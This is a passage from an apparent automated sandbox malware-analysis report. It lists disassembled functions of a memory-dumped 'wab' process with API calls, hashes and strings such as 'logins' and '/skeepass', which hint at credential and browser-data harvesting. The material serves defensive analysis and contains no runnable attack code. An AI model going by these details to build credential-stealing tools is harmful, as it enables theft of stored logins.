                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 1043902810-0
                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                  Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                  • memset.MSVCRT ref: 0040E380
                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                  • memcpy.MSVCRT ref: 0040E3EC
                                                  • memcpy.MSVCRT ref: 0040E407
                                                  • memcpy.MSVCRT ref: 0040E422
                                                  • memcpy.MSVCRT ref: 0040E43D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                  • API String ID: 3073804840-2252543386
                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                  Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                  • API String ID: 2899246560-1542517562
                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                  Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040DBCD
                                                  • memset.MSVCRT ref: 0040DBE9
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                  • API String ID: 3330709923-517860148
                                                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                  Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                  • memset.MSVCRT ref: 0040806A
                                                  • memset.MSVCRT ref: 0040807F
                                                  • _wtoi.MSVCRT ref: 004081AF
                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                  • memset.MSVCRT ref: 004081E4
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                  • String ID: logins$null
                                                  • API String ID: 3492182834-2163367763
                                                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                  Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • memset.MSVCRT ref: 004085CF
                                                  • memset.MSVCRT ref: 004085F1
                                                  • memset.MSVCRT ref: 00408606
                                                  • strcmp.MSVCRT ref: 00408645
                                                  • _mbscpy.MSVCRT ref: 004086DB
                                                  • _mbscpy.MSVCRT ref: 004086FA
                                                  • memset.MSVCRT ref: 0040870E
                                                  • strcmp.MSVCRT ref: 0040876B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                  • String ID: ---
                                                  • API String ID: 3437578500-2854292027
                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                  Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0041087D
                                                  • memset.MSVCRT ref: 00410892
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 1010922700-0
                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                  Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                  • malloc.MSVCRT ref: 004186B7
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                  • malloc.MSVCRT ref: 004186FE
                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$FullNamePath$malloc$Version
                                                  • String ID: |A
                                                  • API String ID: 4233704886-1717621600
                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                  Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                  • API String ID: 2081463915-1959339147
                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                  Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2012295524-70141382
                                                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                  Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                  • API String ID: 667068680-3953557276
                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                  Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                  • memcpy.MSVCRT ref: 0041234D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                  • String ID:
                                                  • API String ID: 1700100422-0
                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                  Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                  • String ID:
                                                  • API String ID: 552707033-0
                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                  Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                  • memcpy.MSVCRT ref: 0040C11B
                                                  • strchr.MSVCRT ref: 0040C140
                                                  • strchr.MSVCRT ref: 0040C151
                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                  • memset.MSVCRT ref: 0040C17A
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                  • String ID: 4$h
                                                  • API String ID: 4066021378-1856150674
                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                  Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: %%0.%df
                                                  • API String ID: 3473751417-763548558
                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                  Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                  • GetParent.USER32(?), ref: 00406136
                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                  Strings
                                                  Memory Dump Source
